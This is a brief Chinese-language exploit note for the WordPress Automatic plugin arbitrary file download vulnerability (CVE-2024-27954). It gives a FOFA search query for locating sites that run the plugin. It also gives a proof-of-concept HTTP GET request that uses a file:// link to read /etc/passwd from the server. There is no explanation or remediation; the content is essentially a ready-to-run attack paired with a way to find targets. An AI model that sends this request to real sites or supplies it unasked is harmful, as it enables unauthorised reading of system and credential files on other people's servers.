WordPress Automatic Plugin任意文件下载漏洞(CVE-2024-27954)
fofa
"/wp-content/plugins/wp-automatic"
poc
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
闽公网安备35020302035932号